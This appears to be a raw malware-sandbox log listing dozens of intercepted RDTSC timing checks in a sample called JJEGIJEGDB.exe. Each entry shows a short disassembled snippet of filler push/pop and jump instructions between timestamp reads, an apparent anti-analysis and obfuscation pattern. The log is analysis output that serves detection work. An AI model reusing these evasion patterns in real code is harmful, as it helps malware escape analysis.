Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: C2DB17 second address: C2DB2C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F34D94219E0h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: C2DB2C second address: C2DB39 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: C2DB39 second address: C2DB47 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F34D94219D6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: C2DC0F second address: C2DC1A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jbe 00007F34D8F44CB6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: C32D02 second address: C32D08 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: C34F71 second address: C34F8E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F34D8F44CC8h 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: C3E07B second address: C3E0A3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pop ecx 0x00000006 pushad 0x00000007 jmp 00007F34D94219E8h 0x0000000c pushad 0x0000000d jg 00007F34D94219D6h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: C3E0A3 second address: C3E0A9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: C440B0 second address: C440DB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F34D94219E2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d jmp 00007F34D94219DAh 0x00000012 jbe 00007F34D94219D6h 0x00000018 popad 0x00000019 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: C440DB second address: C440E5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jg 00007F34D8F44CB6h 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: C440E5 second address: C440E9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: C440E9 second address: C44134 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [esp+04h] 0x0000000c pushad 0x0000000d jmp 00007F34D8F44CC1h 0x00000012 push ecx 0x00000013 pushad 0x00000014 popad 0x00000015 pop ecx 0x00000016 popad 0x00000017 mov eax, dword ptr [eax] 0x00000019 pushad 0x0000001a pushad 0x0000001b pushad 0x0000001c popad 0x0000001d jno 00007F34D8F44CB6h 0x00000023 popad 0x00000024 ja 00007F34D8F44CB8h 0x0000002a popad 0x0000002b mov dword ptr [esp+04h], eax 0x0000002f push eax 0x00000030 push edx 0x00000031 jnl 00007F34D8F44CBCh 0x00000037 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: C44134 second address: C4413A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: C4413A second address: C4413E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: C4908C second address: C49090 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: C49090 second address: C49094 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: C49094 second address: C490BA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jc 00007F34D94219F6h 0x0000000c jmp 00007F34D94219E2h 0x00000011 jbe 00007F34D94219DEh 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: C485EC second address: C48607 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F34D8F44CC5h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: C48607 second address: C4860B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: C4860B second address: C4860F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: C488C6 second address: C488CC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: C488CC second address: C48903 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 pushad 0x00000008 popad 0x00000009 jmp 00007F34D8F44CC6h 0x0000000e pop ecx 0x0000000f jmp 00007F34D8F44CBFh 0x00000014 jnp 00007F34D8F44CBCh 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: C4DF1A second address: C4DF1F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: C1B579 second address: C1B592 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F34D8F44CC5h 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: C1B592 second address: C1B596 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: C1C179 second address: C1C17F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: C1C17F second address: C1C19B instructions: 0x00000000 rdtsc 0x00000002 jno 00007F34D94219D6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d pushad 0x0000000e jmp 00007F34D94219DAh 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: C1C19B second address: C1C19F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: C1C19F second address: C1C231 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 nop 0x00000008 pushad 0x00000009 movzx ebx, di 0x0000000c js 00007F34D94219DCh 0x00000012 mov ebx, dword ptr [ebp+122D3555h] 0x00000018 popad 0x00000019 lea eax, dword ptr [ebp+1246FC53h] 0x0000001f mov dword ptr [ebp+122D1F4Eh], ebx 0x00000025 push eax 0x00000026 jnc 00007F34D94219DAh 0x0000002c mov dword ptr [esp], eax 0x0000002f push 00000000h 0x00000031 push ebp 0x00000032 call 00007F34D94219D8h 0x00000037 pop ebp 0x00000038 mov dword ptr [esp+04h], ebp 0x0000003c add dword ptr [esp+04h], 0000001Dh 0x00000044 inc ebp 0x00000045 push ebp 0x00000046 ret 0x00000047 pop ebp 0x00000048 ret 0x00000049 jmp 00007F34D94219DAh 0x0000004e lea eax, dword ptr [ebp+1246FC0Fh] 0x00000054 push 00000000h 0x00000056 push esi 0x00000057 call 00007F34D94219D8h 0x0000005c pop esi 0x0000005d mov dword ptr [esp+04h], esi 0x00000061 add dword ptr [esp+04h], 00000015h 0x00000069 inc esi 0x0000006a push esi 0x0000006b ret 0x0000006c pop esi 0x0000006d ret 0x0000006e mov edi, dword ptr [ebp+122D1FCAh] 0x00000074 push eax 0x00000075 push eax 0x00000076 push edx 0x00000077 push eax 0x00000078 push edx 0x00000079 pushad 0x0000007a popad 0x0000007b rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: C1C231 second address: C1C237 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: C1C237 second address: C0664D instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pushad 0x00000004 popad 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], eax 0x0000000b mov cx, di 0x0000000e call dword ptr [ebp+122D27D0h] 0x00000014 pushad 0x00000015 push eax 0x00000016 push edx 0x00000017 jnp 00007F34D94219D6h 0x0000001d rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: C4DAB2 second address: C4DAB7 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: C524A7 second address: C524CD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F34D94219E8h 0x00000007 jc 00007F34D94219D6h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 popad 0x00000013 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: C52BB0 second address: C52BC6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F34D8F44CBBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a pushad 0x0000000b popad 0x0000000c pushad 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: C52BC6 second address: C52BD5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jp 00007F34D94219D6h 0x0000000f rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: C52D40 second address: C52D5E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F34D8F44CC9h 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: C5323E second address: C53244 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: C53244 second address: C53255 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 jng 00007F34D8F44CB6h 0x0000000f push esi 0x00000010 pop esi 0x00000011 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: C53255 second address: C5327A instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 jmp 00007F34D94219E7h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jl 00007F34D94219DCh 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: C51C2B second address: C51C5E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F34D8F44CBFh 0x0000000a jmp 00007F34D8F44CC9h 0x0000000f push eax 0x00000010 push edx 0x00000011 push edi 0x00000012 pop edi 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: C5A7FB second address: C5A7FF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: C5A942 second address: C5A946 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: C5AD2B second address: C5AD30 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: C5A525 second address: C5A52F instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F34D8F44CB6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: C5A52F second address: C5A538 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: C5B11E second address: C5B14F instructions: 0x00000000 rdtsc 0x00000002 jo 00007F34D8F44CD1h 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a jmp 00007F34D8F44CC9h 0x0000000f push eax 0x00000010 push edx 0x00000011 jnc 00007F34D8F44CB6h 0x00000017 jng 00007F34D8F44CB6h 0x0000001d rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: C5B14F second address: C5B153 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: C5F08C second address: C5F091 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: C61B90 second address: C61B94 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: C61B94 second address: C61B98 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: C61B98 second address: C61BED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b jbe 00007F34D94219F5h 0x00000011 je 00007F34D94219D6h 0x00000017 jmp 00007F34D94219E9h 0x0000001c jo 00007F34D94219F5h 0x00000022 jne 00007F34D94219D6h 0x00000028 jmp 00007F34D94219E9h 0x0000002d rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: C61BED second address: C61C05 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jns 00007F34D8F44CB6h 0x0000000a jmp 00007F34D8F44CBEh 0x0000000f rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: C63F16 second address: C63F1C instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: C665CE second address: C665D5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop ebx 0x00000007 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: C665D5 second address: C665DC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: C665DC second address: C665E5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: C6C9E0 second address: C6CA0F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007F34D94219D6h 0x0000000a popad 0x0000000b push esi 0x0000000c pushad 0x0000000d popad 0x0000000e pop esi 0x0000000f jmp 00007F34D94219E4h 0x00000014 popad 0x00000015 push eax 0x00000016 push edx 0x00000017 pushad 0x00000018 jns 00007F34D94219D6h 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: C6CA0F second address: C6CA1C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 jo 00007F34D8F44CB6h 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: C6B292 second address: C6B2AA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007F34D94219DDh 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e push esi 0x0000000f pop esi 0x00000010 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: C6B2AA second address: C6B2D5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F34D8F44CC0h 0x00000007 jmp 00007F34D8F44CC7h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: C6B58C second address: C6B593 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: C1BB27 second address: C1BB2D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: C1BBEC second address: C1BBF2 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: C6BCF5 second address: C6BD0F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F34D8F44CC0h 0x0000000d push esi 0x0000000e pop esi 0x0000000f rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: C6BD0F second address: C6BD19 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F34D94219D6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: C6BD19 second address: C6BD61 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F34D8F44CC9h 0x00000007 jmp 00007F34D8F44CC1h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 jnc 00007F34D8F44CC2h 0x00000016 push eax 0x00000017 push edx 0x00000018 pushad 0x00000019 popad 0x0000001a pushad 0x0000001b popad 0x0000001c rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: C6BD61 second address: C6BD71 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 jmp 00007F34D94219DAh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: C6BD71 second address: C6BD76 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: C6F876 second address: C6F886 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F34D94219DCh 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: C6F886 second address: C6F8A6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jp 00007F34D8F44CC3h 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: C6F8A6 second address: C6F8B8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F34D94219DDh 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: C6FCA4 second address: C6FCB5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F34D8F44CBDh 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: C6FCB5 second address: C6FCB9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: C6FCB9 second address: C6FCD3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F34D8F44CBEh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: C6FCD3 second address: C6FCD7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: C6FCD7 second address: C6FCDB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: C6FF82 second address: C6FF86 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: C700E0 second address: C700E5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: C748A6 second address: C748AA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: C748AA second address: C748DB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jmp 00007F34D8F44CBBh 0x0000000d pushad 0x0000000e js 00007F34D8F44CB8h 0x00000014 pushad 0x00000015 popad 0x00000016 pushad 0x00000017 jnc 00007F34D8F44CB6h 0x0000001d jmp 00007F34D8F44CBAh 0x00000022 popad 0x00000023 pushad 0x00000024 push eax 0x00000025 push edx 0x00000026 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: C748DB second address: C748F4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007F34D94219D6h 0x0000000a push ecx 0x0000000b pop ecx 0x0000000c pushad 0x0000000d popad 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 pop eax 0x00000013 ja 00007F34D94219D6h 0x00000019 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: C7A3E8 second address: C7A3EE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: C7AA07 second address: C7AA0F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: C7AA0F second address: C7AA15 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: C7AD0D second address: C7AD15 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: C7AD15 second address: C7AD1B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: C7B56C second address: C7B579 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 jng 00007F34D94219DCh 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
